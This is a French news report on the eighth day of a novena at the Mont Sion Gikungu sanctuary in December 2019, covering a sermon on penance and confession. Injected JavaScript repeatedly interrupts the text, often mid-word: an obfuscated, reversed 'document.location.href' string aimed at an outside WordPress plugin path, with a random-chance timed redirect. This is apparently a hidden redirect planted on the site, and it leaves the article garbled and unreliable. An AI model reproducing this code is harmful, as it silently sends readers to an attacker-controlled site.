La neuvaine à l’Immaculée conception tend vers sa fin. Ce vendredi 6 décembre 2019 était le huitième jour, l’avant dernier jour. Précédée par deux messes, l’une de mariage et l’autre de vendredi soir comme prévu par le calendrier hebtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domadaire du Sanctuaire de la Reine de la Paix et de la Réconciliation de Mont Sion Gikungu, la neuvaine a connu un peu de retard.

Malgré ce petit retard, la chapelle eucharistique, où se déroule ladite neuvaine depuis le premier jour, n’a pas désempli. Les chrétiens ont patienté comme la Vierge Marie jusqu’à l’arrivée du Recteur du Sanctuaire, le Père Herménégilde COYITUNGIYE, le prédicateur du huitième jour dédié à la pénitence.

La neuvaine a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc débuté par l’Atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration du Saint-Sacrement pendant un petit moment et a suivi la proclamation de la Parole tirée de l’évangile selon saint Mathieu. Dans cette prière, introduit le Père, nous voulons voir comment la Vierge Marie a vécu toutes ses toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs, lesquelles toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs vont nous aider à nous approcher du confessionnal. Signalons que ces toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douleurs sont au nombre de sept et sont célébrées le 15 septembre.

Aujourd’hui, nous allons prendre le temps, poursuit le prédicateur, de regarder  au fond du cœur les péchés que nous n’arrivons pas à confesser ou à abtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner. Que, ce vendredi, nous puissions aller au confessionnal afin de consoler le Cœur immaculé de la Vierge Marie.

Selon le Père COYITUNGIYE, ce n’est pas tous les péchés qui sont confessés au confessionnal. Il évoque ici la honte comme blocage et invite tous les chrétiens à changer de comportements afin de se confesser entièrement. Le Prédicateur invite toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc les chrétiens à faire toujours une sérieuse introspection, laquelle introspection est nécessaire à la transformation, avant d’aller à l’endroit du prêtre pour se confesser.

A l’aide du Psaume 122, le prédicateur a invité tous les chrétiens à se repentir. Tous les chrétiens se sont agenouillés devant l’eucharistie et le Père a fait la lecture dudit psaume. Il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc invité les chrétiens qui le veulent à se diriger vers le confessionnal.

Signalons que la neuvaine prend fin ce samedi 7 décembre 2019 par la messe qui débutera à 18 heures. Tous les chrétiens sont invités à y participer munis des bougies.

Germain NAHIMANA

Laisser un commentaire